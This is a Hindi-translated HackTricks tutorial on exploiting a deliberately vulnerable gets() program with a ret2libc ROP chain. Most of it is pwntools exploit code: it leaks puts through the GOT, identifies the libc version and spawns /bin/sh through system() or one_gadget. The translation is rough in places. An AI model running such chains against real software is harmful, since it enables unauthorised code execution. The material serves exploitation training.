hacktricks/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md

297 lines
22 KiB
Markdown

<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
# त्वरित सारांश
1. **ओवरफ्लो ऑफसेट** खोजें
2. `POP_RDI`, `PUTS_PLT` और `MAIN_PLT` गैजेट्स खोजें
3. पिछले गैजेट्स का उपयोग करके **puts या किसी अन्य libc फ़ंक्शन का मेमोरी पता लीक करें** और **libc संस्करण खोजें** ([इसे डाउनलोड करें](https://libc.blukat.me))
4. पुस्तकालय के साथ, **ROP की गणना करें और इसे एक्सप्लॉइट करें**
# अन्य ट्यूटोरियल और बाइनरी प्रैक्टिस करने के लिए
यह ट्यूटोरियल उस कोड/बाइनरी को एक्सप्लॉइट करेगा जो इस ट्यूटोरियल में प्रस्तावित किया गया है: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
और एक उपयोगी ट्यूटोरियल: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
# कोड
फ़ाइलनाम: `vuln.c`
```c
#include <stdio.h>
int main() {
char buffer[32];
puts("Simple ROP.\n");
gets(buffer);
return 0;
}
```
```bash
gcc -o vuln vuln.c -fno-stack-protector -no-pie
```
# ROP - LIBC पता लगाने का टेम्पलेट
मैं यहाँ स्थित कोड का उपयोग करूंगा ताकि एक्सप्लॉइट बनाया जा सके।\
एक्सप्लॉइट डाउनलोड करें और इसे विकल्पी बाइनरी के समान निर्देशिका में रखें और स्क्रिप्ट को आवश्यक डेटा दें:
{% content-ref url="rop-leaking-libc-template.md" %}
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %}
# 1- ऑफसेट खोजना
टेम्पलेट को एक ऑफसेट की आवश्यकता है जिसके बाद एक्सप्लॉइट के साथ जारी रखना है। यदि कोई प्रदान किया जाता है तो यह आवश्यक कोड का निष्पादन करेगा ताकि इसे खोजा जा सके (डिफ़ॉल्ट रूप से `OFFSET = ""`):
```bash
###################
### Find offset ###
###################
OFFSET = ""#"A"*72
if OFFSET == "":
gdb.attach(p.pid, "c") #Attach and continue
payload = cyclic(1000)
print(r.clean())
r.sendline(payload)
#x/wx $rsp -- Search for bytes that crashed the application
#cyclic_find(0x6161616b) # Find the offset of those bytes
return
```
**क्रियान्वित** `python template.py` एक GDB कंसोल खुलेगा जिसमें कार्यक्रम क्रैश हो जाएगा। उस **GDB कंसोल** में `x/wx $rsp` क्रियान्वित करें ताकि RIP को ओवरराइट करने वाले **बाइट्स** प्राप्त हों। अंत में एक **python** कंसोल का उपयोग करके **ऑफसेट** प्राप्त करें:
```python
from pwn import *
cyclic_find(0x6161616b)
```
![](<../../../.gitbook/assets/image (140).png>)
ऑफसेट (इस मामले में 40) पाने के बाद, उस मान का उपयोग करके टेम्पलेट के अंदर OFFSET वेरिएबल को बदलें।\
`OFFSET = "A" * 40`
एक और तरीका हो सकता है: `pattern create 1000` -- _रिटर्न तक चलाएं_ -- `pattern seach $rsp` GEF से।
# 2- गैजेट्स खोजना
अब हमें बाइनरी के अंदर ROP गैजेट्स खोजने की आवश्यकता है। ये ROP गैजेट्स `puts` को कॉल करने के लिए उपयोगी होंगे **libc** को खोजने के लिए, और बाद में **अंतिम ध्वनि** को लॉन्च करने के लिए।
```python
PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
MAIN_PLT = elf.symbols['main']
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
RET = (rop.find_gadget(['ret']))[0]
log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret gadget: " + hex(POP_RDI))
```
`PUTS_PLT` को **फ़ंक्शन puts** को कॉल करने के लिए आवश्यक है।\
`MAIN_PLT` को **मुख्य फ़ंक्शन** को फिर से कॉल करने के लिए आवश्यक है एक इंटरेक्शन के बाद **ओवरफ़्लो** को **फिर से शोषित** करने के लिए (असीमित दौरों के शोषण)। **यह प्रोग्राम को फिर से कॉल करने के लिए प्रत्येक ROP के अंत में उपयोग किया जाता है**।\
**POP\_RDI** को **एक पैरामीटर** को बुलाने के लिए आवश्यक है।
इस चरण में आपको कुछ भी नहीं चलाने की आवश्यकता है क्योंकि प्रत्येक चलाने के दौरान pwntools द्वारा सभी चीजें मिल जाएंगी।
# 3- LIBC पुस्तकालय खोजना
अब समय है पता लगाने का कि कौन सी **libc** पुस्तकालय का उपयोग हो रहा है। इसे करने के लिए हमें **फ़ंक्शन** `puts` की **मेमोरी** में **पता** लगाना होगा और फिर हमें देखना होगा कि उस पते पर कौन सी **पुस्तकालय संस्करण** है।
```python
def get_addr(func_name):
FUNC_GOT = elf.got[func_name]
log.info(func_name + " GOT @ " + hex(FUNC_GOT))
# Create rop chain
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
#Send our rop-chain payload
#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
print(p.clean()) # clean socket buffer (read all and print)
p.sendline(rop1)
#Parse leaked address
recieved = p.recvline().strip()
leak = u64(recieved.ljust(8, "\x00"))
log.info("Leaked libc address, "+func_name+": "+ hex(leak))
#If not libc yet, stop here
if libc != "":
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))
return hex(leak)
get_addr("puts") #Search for puts address in memmory to obtains libc base
if libc == "":
print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
p.interactive()
```
इसे करने के लिए, निष्पादित कोड की सबसे महत्वपूर्ण लाइन है:
```python
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
```
यह कुछ बाइट भेजेगा जब तक **RIP** को **ओवरराइट** करना संभव हो: `OFFSET`
फिर, यह **POP_RDI** गैजेट का **पता** सेट करेगा ताकि अगला पता (`FUNC_GOT`) **RDI** रजिस्ट्री में सहेजा जाए। यह इसलिए है क्योंकि हमें **puts** को **बुलाना** है जिसे हम **पता** के रूप में `PUTS_GOT` का **पता** **पास** करेंगे क्योंकि मेमोरी में puts फ़ंक्शन का पता `PUTS_GOT` द्वारा पॉइंट करने वाले पते में सहेजा जाता है।
उसके बाद, `PUTS_PLT` को बुलाया जाएगा (`RDI` में `PUTS_GOT` के साथ) ताकि puts मेमोरी में `PUTS_GOT` में भीतर की सामग्री पढ़ सके (**मेमोरी में puts फ़ंक्शन का पता**) और इसे **छाप देगा**
अंत में, **मुख्य फ़ंक्शन को फिर से बुलाया जाता है** ताकि हम फिर से ओवरफ़्लो का शोध कर सकें।
इस तरह हमने **puts फ़ंक्शन को धोखा दिया** है कि वह **मेमोरी** में **puts** फ़ंक्शन का **पता छापेगा** (जो **libc** पुस्तकालय के अंदर है)। अब हमारे पास उस पते के साथ है तो हम **खोज सकते हैं कि कौन सी libc संस्करण का उपयोग हो रहा है**
![](<../../../.gitbook/assets/image (141).png>)
हम किसी **स्थानीय** बाइनरी का **शोधन** कर रहे हैं इसलिए यह **आवश्यक नहीं है** कि कौन सा **libc** संस्करण उपयोग हो रहा है (केवल `/lib/x86_64-linux-gnu/libc.so.6` में पुस्तकालय खोजें)।
लेकिन, एक दूरस्थ शोध केस में मैं यहाँ विवरण देता हूँ कि आप इसे कैसे खोज सकते हैं:
## 3.1- libc संस्करण की खोज (1)
आप वेब पृष्ठ में खोज सकते हैं कि कौन सी पुस्तकालय का उपयोग हो रहा है: [https://libc.blukat.me/](https://libc.blukat.me)\
यह आपको **libc** के खोजे गए संस्करण को डाउनलोड करने की अनुमति देगा
![](<../../../.gitbook/assets/image (142).png>)
## 3.2- libc संस्करण की खोज (2)
आप यह भी कर सकते हैं:
* `$ git clone https://github.com/niklasb/libc-database.git`
* `$ cd libc-database`
* `$ ./get`
इसमें कुछ समय लगेगा, धैर्य रखें।
इसके लिए काम करने के लिए हमें चाहिए:
* Libc सिम्बल नाम: `puts`
* लीकेड libc पता: `0x7ff629878690`
हम यह तय कर सकते हैं कि कौन सी **libc** उपयोग की जा रही है।
```
./find puts 0x7ff629878690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
archive-glibc (id libc6_2.23-0ubuntu11_amd64)
```
हमें 2 मैच मिलते हैं (अगर पहला काम नहीं कर रहा है तो आपको दूसरा प्रयास करना चाहिए)। पहले वाला डाउनलोड करें:
```
./download libc6_2.23-0ubuntu10_amd64
Getting libc6_2.23-0ubuntu10_amd64
-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
-> Downloading package
-> Extracting package
-> Package saved to libs/libc6_2.23-0ubuntu10_amd64
```
कॉपी करें libc को `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` से हमारे कामकाज निर्देशिका में।
## 3.3- लीक करने के लिए अन्य फ़ंक्शन
```python
puts
printf
__libc_start_main
read
gets
```
# 4- आधारित libc पता लगाना और उसका शोषण
इस बिंदु पर हमें यह जानना चाहिए कि कौन सी libc पुस्तकालय का उपयोग हो रहा है। हम एक स्थानीय बाइनरी का शोषण कर रहे हैं इसलिए मैं केवल इस्तेमाल करूंगा: `/lib/x86_64-linux-gnu/libc.so.6`
तो, `template.py` की शुरुआत में **libc** चर को बदलें: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it`
**libc पुस्तकालय** के **पथ** को देने से **शोषण का शेष भाग स्वचालित रूप से** होगा।
`get_addr` फ़ंक्शन के भीतर **libc का आधार पता** लगाया जाएगा:
```python
if libc != "":
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))
```
{% hint style="info" %}
ध्यान दें कि **अंतिम libc बेस पता 00 में समाप्त होना चाहिए**। यदि ऐसा नहीं है तो आपने गलत पुस्तकालय का लीक किया हो सकता है।
{% endhint %}
फिर, **सिस्टम** फ़ंक्शन के पते और **स्ट्रिंग** _"/bin/sh"_ का **पता** **बेस पते** से **गणना** किया जाएगा और दिया जाएगा **libc पुस्तकालय** का।
```python
BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
```
अंत में, /bin/sh निष्पादन शीघ्रता तैयार की जा रही है भेजी जाएगी:
```python
rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
p.clean()
p.sendline(rop2)
#### Interact with the shell #####
p.interactive() #Interact with the conenction
```
Let's explain this final ROP.\
अंतिम ROP (`rop1`) को फिर से मुख्य फ़ंक्शन को बुलाकर समाप्त किया गया, फिर हम **फिर से शोषण** कर सकते हैं (इसीलिए `OFFSET` यहाँ फिर से है)। फिर, हमें `POP_RDI` को _"/bin/sh"_ (`BINSH`) के **पते** पर पुकारना है और **सिस्टम** फ़ंक्शन (`SYSTEM`) को कॉल करना है क्योंकि _"/bin/sh"_ का पता पैरामीटर के रूप में पास किया जाएगा।\
अंत में, **एक्ज़िट फ़ंक्शन का पता** **कॉल** किया जाता है ताकि प्रक्रिया **अच्छे से समाप्त** हो जाए और कोई चेतावनी उत्पन्न न हो।
**इस तरह शोषण एक **_**/bin/sh**_** शैली को निष्पादित करेगा।**
![](<../../../.gitbook/assets/image (143).png>)
# 4(2)- एक ONE\_GADGET का उपयोग करना
आप [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)का उपयोग करके एक शैली प्राप्त करने के लिए एक शैली प्राप्त कर सकते हैं बजाय **सिस्टम** और **"/bin/sh"** का उपयोग करने के। **ONE\_GADGET** एक **ROP पता** का उपयोग करके केवल एक शैली प्राप्त करने के लिए libc लाइब्रेरी के अंदर कुछ तरीका खोजेगा। \
हालांकि, सामान्यत: कुछ प्रतिबंध होते हैं, सबसे सामान्य और आसान टालने वाले वे जैसे हैं `[rsp+0x30] == NULL` जैसे आप **RSP** के मानों को नियंत्रित करते हैं तो आपको बस कुछ अधिक NULL मान भेजना होगा ताकि प्रतिबंध टाला जा सके।
![](<../../../.gitbook/assets/image (615).png>)
```python
ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100
```
# एक्सप्लॉइट फ़ाइल
आप इस वंशावशेषता का उपयोग करने के लिए एक टेम्पलेट यहाँ पा सकते हैं:
{% content-ref url="rop-leaking-libc-template.md" %}
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %}
# सामान्य समस्याएँ
## MAIN\_PLT = elf.symbols\['main'] नहीं मिला
यदि "main" प्रतीक मौजूद नहीं है। तो आप सीधे मुख्य कोड का पता लगा सकते हैं:
```python
objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
0000000000401080 <.text>:
```
और पता मैन्युअल रूप से सेट करें:
```python
MAIN_PLT = 0x401080
```
## Puts नहीं मिला
यदि बाइनरी Puts का उपयोग नहीं कर रहा है तो आपको यह जांचना चाहिए कि क्या यह इस्तेमाल कर रहा है
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
यदि आप इस **त्रुटि** को पाते हैं जब आप **सभी** एक्सप्लॉइट बनाने के बाद: `sh: 1: %s%s%s%s%s%s%s%s: not found`
तो कोशिश करें **"/bin/sh" के पते में 64 बाइट कम करें**:
```python
BINSH = next(libc.search("/bin/sh")) - 64
```
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>